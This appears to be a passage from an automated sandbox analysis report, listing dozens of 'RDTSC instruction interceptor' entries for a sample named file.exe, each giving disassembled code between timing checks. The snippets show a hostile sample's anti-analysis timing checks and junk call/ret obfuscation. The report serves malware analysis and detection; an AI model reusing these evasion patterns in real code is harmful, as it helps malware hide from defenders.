                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 114F208 second address: 114F288 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jnc 00007FC83CB776AEh 0x0000000f nop 0x00000010 sub ebx, dword ptr [ebp+122D1966h] 0x00000016 mov di, 8803h 0x0000001a push 00000000h 0x0000001c push 00000000h 0x0000001e push ecx 0x0000001f call 00007FC83CB776A8h 0x00000024 pop ecx 0x00000025 mov dword ptr [esp+04h], ecx 0x00000029 add dword ptr [esp+04h], 00000018h 0x00000031 inc ecx 0x00000032 push ecx 0x00000033 ret 0x00000034 pop ecx 0x00000035 ret 0x00000036 push 00000000h 0x00000038 push 00000000h 0x0000003a push esi 0x0000003b call 00007FC83CB776A8h 0x00000040 pop esi 0x00000041 mov dword ptr [esp+04h], esi 0x00000045 add dword ptr [esp+04h], 0000001Bh 0x0000004d inc esi 0x0000004e push esi 0x0000004f ret 0x00000050 pop esi 0x00000051 ret 0x00000052 mov dword ptr [ebp+122D17EDh], eax 0x00000058 xchg eax, esi 0x00000059 pushad 0x0000005a jmp 00007FC83CB776ABh 0x0000005f push eax 0x00000060 push edx 0x00000061 push ecx 0x00000062 pop ecx 0x00000063 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 114F288 second address: 114F2AA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC83CB64D43h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e jnp 00007FC83CB64D36h 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11501B0 second address: 11501B6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11501B6 second address: 1150222 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b push 00000000h 0x0000000d push edx 0x0000000e call 00007FC83CB64D38h 0x00000013 pop edx 0x00000014 mov dword ptr [esp+04h], edx 0x00000018 add dword ptr [esp+04h], 00000019h 0x00000020 inc edx 0x00000021 push edx 0x00000022 ret 0x00000023 pop edx 0x00000024 ret 0x00000025 and ebx, dword ptr [ebp+122D1AE1h] 0x0000002b push 00000000h 0x0000002d push 00000000h 0x0000002f push esi 0x00000030 call 00007FC83CB64D38h 0x00000035 pop esi 0x00000036 mov dword ptr [esp+04h], esi 0x0000003a add dword ptr [esp+04h], 00000014h 0x00000042 inc esi 0x00000043 push esi 0x00000044 ret 0x00000045 pop esi 0x00000046 ret 0x00000047 mov edi, dword ptr [ebp+122D2C3Bh] 0x0000004d push 00000000h 0x0000004f mov dword ptr [ebp+122D21A6h], ebx 0x00000055 push eax 0x00000056 pushad 0x00000057 jo 00007FC83CB64D38h 0x0000005d pushad 0x0000005e popad 0x0000005f push eax 0x00000060 push edx 0x00000061 push eax 0x00000062 push edx 0x00000063 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1150222 second address: 1150226 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 115042C second address: 1150451 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC83CB64D43h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ecx 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e push ebx 0x0000000f pop ebx 0x00000010 jbe 00007FC83CB64D36h 0x00000016 popad 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1151415 second address: 115141B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11531D6 second address: 11531DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11531DB second address: 11531FC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC83CB776B2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push ecx 0x0000000d jno 00007FC83CB776A6h 0x00000013 pop ecx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11531FC second address: 1153243 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 pushad 0x0000000a mov bx, D51Bh 0x0000000e mov cl, E6h 0x00000010 popad 0x00000011 push 00000000h 0x00000013 mov dword ptr [ebp+122D20F3h], esi 0x00000019 push 00000000h 0x0000001b push 00000000h 0x0000001d push ebp 0x0000001e call 00007FC83CB64D38h 0x00000023 pop ebp 0x00000024 mov dword ptr [esp+04h], ebp 0x00000028 add dword ptr [esp+04h], 0000001Ah 0x00000030 inc ebp 0x00000031 push ebp 0x00000032 ret 0x00000033 pop ebp 0x00000034 ret 0x00000035 movzx edi, dx 0x00000038 push eax 0x00000039 push eax 0x0000003a push edx 0x0000003b push eax 0x0000003c push edx 0x0000003d push eax 0x0000003e push edx 0x0000003f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1153243 second address: 1153247 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1153247 second address: 1153251 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FC83CB64D36h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1155271 second address: 1155289 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007FC83CB776A6h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FC83CB776ABh 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10F180E second address: 10F181D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007FC83CB64D36h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10F181D second address: 10F1823 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 115783E second address: 115785F instructions: 0x00000000 rdtsc 0x00000002 jns 00007FC83CB64D46h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 115785F second address: 1157863 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1157863 second address: 115786D instructions: 0x00000000 rdtsc 0x00000002 js 00007FC83CB64D36h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11579D8 second address: 11579DC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11579DC second address: 11579E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 115A759 second address: 115A7C6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC83CB776AAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c mov dword ptr [ebp+124830F0h], eax 0x00000012 mov ebx, dword ptr [ebp+122D2174h] 0x00000018 push 00000000h 0x0000001a push 00000000h 0x0000001c push edi 0x0000001d call 00007FC83CB776A8h 0x00000022 pop edi 0x00000023 mov dword ptr [esp+04h], edi 0x00000027 add dword ptr [esp+04h], 00000019h 0x0000002f inc edi 0x00000030 push edi 0x00000031 ret 0x00000032 pop edi 0x00000033 ret 0x00000034 mov di, 97E8h 0x00000038 mov dword ptr [ebp+1244D3DEh], edi 0x0000003e push 00000000h 0x00000040 pushad 0x00000041 jnc 00007FC83CB776ACh 0x00000047 stc 0x00000048 popad 0x00000049 push eax 0x0000004a push eax 0x0000004b push edx 0x0000004c push edi 0x0000004d jmp 00007FC83CB776ADh 0x00000052 pop edi 0x00000053 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 115C6C5 second address: 115C6CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 115C900 second address: 115C90B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push esi 0x00000008 pop esi 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 115D79A second address: 115D7A4 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 115D7A4 second address: 115D7A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 115F7F7 second address: 115F801 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 115E93A second address: 115E93E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 115F801 second address: 115F86E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 popad 0x00000008 push eax 0x00000009 jnl 00007FC83CB64D4Eh 0x0000000f nop 0x00000010 stc 0x00000011 push 00000000h 0x00000013 pushad 0x00000014 push esi 0x00000015 mov ebx, dword ptr [ebp+122D2B4Fh] 0x0000001b pop esi 0x0000001c pushad 0x0000001d mov ebx, dword ptr [ebp+122D1BCDh] 0x00000023 popad 0x00000024 popad 0x00000025 push 00000000h 0x00000027 push 00000000h 0x00000029 push eax 0x0000002a call 00007FC83CB64D38h 0x0000002f pop eax 0x00000030 mov dword ptr [esp+04h], eax 0x00000034 add dword ptr [esp+04h], 0000001Ah 0x0000003c inc eax 0x0000003d push eax 0x0000003e ret 0x0000003f pop eax 0x00000040 ret 0x00000041 mov di, 8806h 0x00000045 xchg eax, esi 0x00000046 push eax 0x00000047 push edx 0x00000048 pushad 0x00000049 push ebx 0x0000004a pop ebx 0x0000004b push eax 0x0000004c push edx 0x0000004d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 115E93E second address: 115E942 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 115F86E second address: 115F873 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 115F873 second address: 115F89A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC83CB776B8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jng 00007FC83CB776ACh 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 115F89A second address: 115F89E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 115F9AC second address: 115F9C1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC83CB776B1h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1167ACE second address: 1167AD9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007FC83CB64D36h 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1167551 second address: 1167581 instructions: 0x00000000 rdtsc 0x00000002 jns 00007FC83CB776A6h 0x00000008 jmp 00007FC83CB776B5h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f jmp 00007FC83CB776B1h 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 116BF1D second address: 116BF21 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 116BF21 second address: 116BF27 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 116BF27 second address: 116BF2D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 116C055 second address: 116C080 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC83CB776B7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop eax 0x0000000a mov eax, dword ptr [eax] 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FC83CB776ABh 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 116C080 second address: 116C085 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 116C0DE second address: 116C0E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 116C0E2 second address: 116C0E6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 116C0E6 second address: 116C0EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 116C1D5 second address: 116C1DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 116C1DA second address: F91BA0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a xor dword ptr [esp], 118B668Ch 0x00000011 jp 00007FC83CB776B2h 0x00000017 push dword ptr [ebp+122D1529h] 0x0000001d jnl 00007FC83CB776A7h 0x00000023 stc 0x00000024 call dword ptr [ebp+122D29D3h] 0x0000002a pushad 0x0000002b sub dword ptr [ebp+122D31FEh], edi 0x00000031 xor eax, eax 0x00000033 mov dword ptr [ebp+122D26D4h], ecx 0x00000039 mov edx, dword ptr [esp+28h] 0x0000003d or dword ptr [ebp+122D26D4h], edx 0x00000043 mov dword ptr [ebp+122D29E7h], eax 0x00000049 jmp 00007FC83CB776ADh 0x0000004e mov esi, 0000003Ch 0x00000053 jnl 00007FC83CB776ACh 0x00000059 mov dword ptr [ebp+122D33C6h], eax 0x0000005f add esi, dword ptr [esp+24h] 0x00000063 pushad 0x00000064 mov dword ptr [ebp+122D31FEh], ecx 0x0000006a or ecx, dword ptr [ebp+122D2C47h] 0x00000070 popad 0x00000071 lodsw 0x00000073 sub dword ptr [ebp+122D26D4h], esi 0x00000079 add eax, dword ptr [esp+24h] 0x0000007d pushad 0x0000007e mov dword ptr [ebp+122D31FEh], ecx 0x00000084 push eax 0x00000085 pop esi 0x00000086 popad 0x00000087 mov ebx, dword ptr [esp+24h] 0x0000008b jmp 00007FC83CB776B7h 0x00000090 push eax 0x00000091 pushad 0x00000092 push edx 0x00000093 push eax 0x00000094 push edx 0x00000095 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1170C93 second address: 1170C9B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1170C9B second address: 1170CB4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007FC83CB776B3h 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1170E1C second address: 1170E22 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1170F63 second address: 1170F67 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1170F67 second address: 1170F6D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1170F6D second address: 1170F77 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jng 00007FC83CB776A6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11713C4 second address: 11713C9 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11713C9 second address: 11713D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push edi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1176729 second address: 117673C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FC83CB64D3Eh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1176C0A second address: 1176C10 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1176C10 second address: 1176C3C instructions: 0x00000000 rdtsc 0x00000002 jp 00007FC83CB64D36h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007FC83CB64D3Ch 0x00000011 popad 0x00000012 push ecx 0x00000013 push eax 0x00000014 push edx 0x00000015 jnp 00007FC83CB64D36h 0x0000001b jmp 00007FC83CB64D3Ah 0x00000020 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 117735D second address: 1177378 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC83CB776B7h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1177632 second address: 117765A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC83CB64D3Eh 0x00000009 jmp 00007FC83CB64D46h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 117765A second address: 1177664 instructions: 0x00000000 rdtsc 0x00000002 je 00007FC83CB776ACh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1176415 second address: 117643F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC83CB64D49h 0x00000009 pop edx 0x0000000a jno 00007FC83CB64D3Ch 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 117643F second address: 1176446 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 117C368 second address: 117C375 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 jg 00007FC83CB64D36h 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 117C375 second address: 117C391 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC83CB776ADh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push esi 0x0000000b pop esi 0x0000000c jg 00007FC83CB776A6h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 117C4D5 second address: 117C4E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push edx 0x00000008 push edi 0x00000009 pop edi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 117CD93 second address: 117CDA9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC83CB776B2h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 117CDA9 second address: 117CDB4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 push edi 0x0000000a pop edi 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 117CDB4 second address: 117CDB8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10F4D6B second address: 10F4D75 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FC83CB64D36h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10F4D75 second address: 10F4D7F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10F4D7F second address: 10F4D89 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007FC83CB64D36h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10F4D89 second address: 10F4D8D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10F4D8D second address: 10F4DD2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 pushad 0x0000000a pushad 0x0000000b push esi 0x0000000c pop esi 0x0000000d pushad 0x0000000e popad 0x0000000f push edi 0x00000010 pop edi 0x00000011 popad 0x00000012 jno 00007FC83CB64D4Ch 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b popad 0x0000001c jmp 00007FC83CB64D43h 0x00000021 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10F4DD2 second address: 10F4DD8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 118089F second address: 11808A6 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1143A20 second address: 1143A2A instructions: 0x00000000 rdtsc 0x00000002 je 00007FC83CB776A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1143A2A second address: 1143A34 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jng 00007FC83CB64D36h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1143A34 second address: 1143A43 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1143A43 second address: 1143A49 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11440E9 second address: 114414A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov dword ptr [esp], esi 0x00000009 push 00000000h 0x0000000b push ecx 0x0000000c call 00007FC83CB776A8h 0x00000011 pop ecx 0x00000012 mov dword ptr [esp+04h], ecx 0x00000016 add dword ptr [esp+04h], 00000019h 0x0000001e inc ecx 0x0000001f push ecx 0x00000020 ret 0x00000021 pop ecx 0x00000022 ret 0x00000023 or dword ptr [ebp+122D28CAh], ecx 0x00000029 nop 0x0000002a pushad 0x0000002b jo 00007FC83CB776A8h 0x00000031 pushad 0x00000032 popad 0x00000033 push esi 0x00000034 push ebx 0x00000035 pop ebx 0x00000036 pop esi 0x00000037 popad 0x00000038 push eax 0x00000039 pushad 0x0000003a jmp 00007FC83CB776B7h 0x0000003f pushad 0x00000040 je 00007FC83CB776A6h 0x00000046 push eax 0x00000047 push edx 0x00000048 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1144407 second address: 114440B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 114440B second address: 1144411 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
